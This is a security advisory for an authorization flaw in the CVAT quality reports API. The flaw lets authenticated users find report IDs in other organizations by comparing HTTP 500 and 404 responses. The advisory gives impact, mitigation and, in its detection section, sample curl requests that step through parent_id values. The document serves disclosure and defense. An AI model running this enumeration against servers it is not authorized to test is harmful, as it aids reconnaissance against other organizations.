Improper Authorization in CVAT Quality Reports API

Executive Summary

CVE-2026-58373 is an improper authorization vulnerability in CVAT versions before 2.69.0. It occurs in the QualityReportViewSet.get_queryset function, where a missing permission check on the parent_id query parameter allows authenticated attackers to enumerate quality report identifiers belonging to other organizations.

Attackers exploit this by sending requests with sequential integer parent_id values to the quality reports API endpoint. They can distinguish between existing and non-existing reports based on different HTTP responses: HTTP 500 errors indicate existing reports in inaccessible organizations, while HTTP 404 errors indicate non-existing reports. This leaks information about the existence of reports across organizations without exposing the report content.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability allows an authenticated attacker to discover the existence of quality reports in organizations they do not belong to by enumerating report identifiers. Although the attacker cannot access the content of these reports, the ability to confirm the presence or absence of reports can lead to information leakage about organizational activities or data.

Such information disclosure can be used for reconnaissance purposes, potentially aiding further targeted attacks or social engineering by revealing sensitive metadata about other organizations' reports.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by sending authenticated requests to the CVAT API endpoint /api/quality/reports with sequential integer values for the parent_id query parameter.

By observing the HTTP response codes, an attacker can distinguish between existing and non-existing quality reports belonging to other organizations. Specifically, HTTP 500 responses indicate the existence of a report in an inaccessible organization, while HTTP 404 responses indicate non-existence.

A sample command using curl to test this might look like:

• curl -i -H "Authorization: Bearer <token>" "https://<cvat-server>/api/quality/reports?parent_id=1"
• curl -i -H "Authorization: Bearer <token>" "https://<cvat-server>/api/quality/reports?parent_id=2"

By incrementing the parent_id value and analyzing the HTTP status codes (500 vs 404), you can detect if the vulnerability exists and if unauthorized enumeration is possible.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate mitigation step is to upgrade CVAT to version 2.69.0 or later, where this vulnerability has been fixed.

The fix involves adding explicit permission checks on the parent_id parameter in the /api/quality/reports endpoint to prevent unauthorized enumeration of quality reports across organizations.

Until the upgrade can be applied, consider restricting access to the affected API endpoint to trusted users only and monitoring for suspicious requests that attempt to enumerate parent_id values.

Useful 0 Not Useful 0